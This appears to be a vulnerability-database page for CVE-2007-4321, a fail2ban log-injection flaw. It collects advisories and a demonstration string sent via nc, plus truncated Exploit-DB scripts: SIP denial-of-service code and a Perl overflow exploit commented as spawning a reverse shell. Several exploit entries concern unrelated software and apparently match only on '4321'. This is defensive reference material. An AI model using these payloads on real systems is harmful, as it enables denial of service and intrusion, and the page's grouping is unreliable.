CVE-2007-4321
published 2007-08-14CVE-2007-4321: fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a…
PriorityP333medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
5.75%
92.1th percentile
fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in via ssh with a client protocol version identification containing an IP address string, a different vector than CVE-2006-6302.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | fail2ban | < fail2ban 0.8.0-4 (bookworm) | fail2ban 0.8.0-4 (bookworm) |
| debian | fail2ban | < fail2ban 0.8.3-2sid1 (bookworm) | fail2ban 0.8.3-2sid1 (bookworm) |
| fail2ban | fail2ban | — | — |
| fail2ban | fail2ban | — | — |
| fail2ban | fail2ban | >= 0 < 0.8.3-2sid1 | 0.8.3-2sid1 |
| fail2ban | fail2ban | >= 0 < 0.8.0-4 | 0.8.0-4 |
| fail2ban | fail2ban | >= 0 < 0.8.3-2sid1 | 0.8.3-2sid1 |
| fail2ban | fail2ban | >= 0 < 0.8.0-4 | 0.8.0-4 |
| fail2ban | fail2ban | >= 0 < 0.8.3-2sid1 | 0.8.3-2sid1 |
| fail2ban | fail2ban | >= 0 < 0.8.0-4 | 0.8.0-4 |
| fail2ban | fail2ban | >= 0 < 0.8.3-2sid1 | 0.8.3-2sid1 |
| fail2ban | fail2ban | >= 0 < 0.8.0-4 | 0.8.0-4 |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8LOW
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rc77-w9xr-6vvf: filter
ghsa_unreviewed·2022-05-02·CVSS 6.8
CVE-2009-0362 [MEDIUM] CWE-287 GHSA-rc77-w9xr-6vvf: filter
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
GHSA
GHSA-5jfx-9p58-q8pj: fail2ban 0
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-4321 [MEDIUM] GHSA-5jfx-9p58-q8pj: fail2ban 0
fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in via ssh with a client protocol version identification containing an IP address string, a different vector than CVE-2006-6302.
OSV
CVE-2009-0362: filter
osv·2009-02-13·CVSS 6.8
CVE-2009-0362 [MEDIUM] CVE-2009-0362: filter
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
OSV
CVE-2007-4321: fail2ban 0
osv·2007-08-14·CVSS 5.0
CVE-2007-4321 [MEDIUM] CVE-2007-4321: fail2ban 0
fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in via ssh with a client protocol version identification containing an IP address string, a different vector than CVE-2006-6302.
Red Hat
fail2ban: remote DoS via crafted domain names
vendor_redhat·2009-02-04·CVSS 6.8
CVE-2009-0362 [MEDIUM] fail2ban: remote DoS via crafted domain names
fail2ban: remote DoS via crafted domain names
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
Debian
CVE-2009-0362: fail2ban - filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that...
vendor_debian·2009·CVSS 6.8
CVE-2009-0362 [MEDIUM] CVE-2009-0362: fail2ban - filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that...
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular expression that allows remote attackers to cause a denial of service (forced authentication failures) via a crafted reverse-resolved DNS name (rhost) entry that contains a substring that is interpreted as an IP address, a different vulnerability than CVE-2007-4321.
Scope: local
bookworm: resolved (fixed in 0.8.3-2sid1)
bullseye: resolved (fixed in 0.8.3-2sid1)
forky: resolved (fixed in 0.8.3-2sid1)
sid: resolved (fixed in 0.8.3-2sid1)
trixie: resolved (fixed in 0.8.3-2sid1)
Debian
CVE-2007-4321: fail2ban - fail2ban 0.8 and earlier does not properly parse sshd log files, which allows re...
vendor_debian·2007·CVSS 5.0
CVE-2007-4321 [MEDIUM] CVE-2007-4321: fail2ban - fail2ban 0.8 and earlier does not properly parse sshd log files, which allows re...
fail2ban 0.8 and earlier does not properly parse sshd log files, which allows remote attackers to add arbitrary hosts to the /etc/hosts.deny file and cause a denial of service by adding arbitrary IP addresses to the sshd log file, as demonstrated by logging in via ssh with a client protocol version identification containing an IP address string, a different vector than CVE-2006-6302.
Scope: local
bookworm: resolved (fixed in 0.8.0-4)
bullseye: resolved (fixed in 0.8.0-4)
forky: resolved (fixed in 0.8.0-4)
sid: resolved (fixed in 0.8.0-4)
trixie: resolved (fixed in 0.8.0-4)
No detection rules found.
Exploit-DB
OpenH323 Opal SIP Protocol - Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4924 [MEDIUM] OpenH323 Opal SIP Protocol - Remote Denial of Service
OpenH323 Opal SIP Protocol - Remote Denial of Service
---
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:[email protected] SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5
Exploit-DB
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
exploitdb·2009-07-24·CVSS 5.0
CVE-2007-4897 [MEDIUM] Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
---
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b7
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
exploitdb·2007-10-01
CVE-2007-5256 FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
---
source: https://www.securityfocus.com/bid/25883/info
FSD is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
These issues affect FSD 2.052 d9 and 3.0000 d9; other versions may also be affected.
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my
Exploit-DB
Fail2ban 0.8 - Remote Denial of Service
exploitdb·2007-07-28
CVE-2007-4321 Fail2ban 0.8 - Remote Denial of Service
Fail2ban 0.8 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/25117/info
Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
ROOT LOGIN REFUSED hi FROM 1.2.3.4
where '1.2.3.4' is an IP address to be blocked.
Bugzilla
CVE-2009-0362 fail2ban: remote DoS via crafted domain names
bugzilla·2009-02-13·CVSS 6.8
CVE-2009-0362 [MEDIUM] CVE-2009-0362 fail2ban: remote DoS via crafted domain names
CVE-2009-0362 fail2ban: remote DoS via crafted domain names
Name: CVE-2009-0362
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0362
Assigned: 20090129
Reference: CONFIRM: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514163
Reference: BID:33734
Reference: URL: http://www.securityfocus.com/bid/33734
Reference: SECUNIA:33890
Reference: URL: http://secunia.com/advisories/33890
filter.d/wuftpd.conf in Fail2ban 0.8.3 uses an incorrect regular
expression that allows remote attackers to cause a denial of service
(forced authentication failures) via a crafted reverse-resolved DNS
name (rhost) entry that contains a substring that is interpreted as an
IP address, a different vulnerability than CVE-2007-4321.
Discussion:
Created attachment 331847
patch to fix the issue taken from
Bugzilla
CVE-2007-4584 Buffer overflow in IrcII by long MODE from server
bugzilla·2007-09-24·CVSS 10.0
CVE-2007-4584 [CRITICAL] CVE-2007-4584 Buffer overflow in IrcII by long MODE from server
CVE-2007-4584 Buffer overflow in IrcII by long MODE from server
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-4584 to the following vulnerability:
Stack-based buffer overflow in BitchX 1.1 Final allows remote IRC servers to execute arbitrary code via a long string in a MODE command, related to the p_mode variable.
References:
http://www.milw0rm.com/exploits/4321
http://www.securityfocus.com/bid/25462
http://www.frsirt.com/english/advisories/2007/2994
http://secunia.com/advisories/26578
http://xforce.iss.net/xforce/xfdb/36306
Discussion:
This flaw does not affect version of IrcII as shipped in ircii package with Red
Hat Enterprise Linux version 2.1.
http://bugs.gentoo.org/show_bug.cgi?id=181214http://osvdb.org/42484http://secunia.com/advisories/23237http://secunia.com/advisories/28374http://security.gentoo.org/glsa/glsa-200707-13.xmlhttp://www.debian.org/security/2008/dsa-1456http://www.ossec.net/en/attacking-loganalysis.htmlhttp://www.securityfocus.com/bid/25117http://bugs.gentoo.org/show_bug.cgi?id=181214http://osvdb.org/42484http://secunia.com/advisories/23237http://secunia.com/advisories/28374http://security.gentoo.org/glsa/glsa-200707-13.xmlhttp://www.debian.org/security/2008/dsa-1456http://www.ossec.net/en/attacking-loganalysis.htmlhttp://www.securityfocus.com/bid/25117
2007-08-14
Published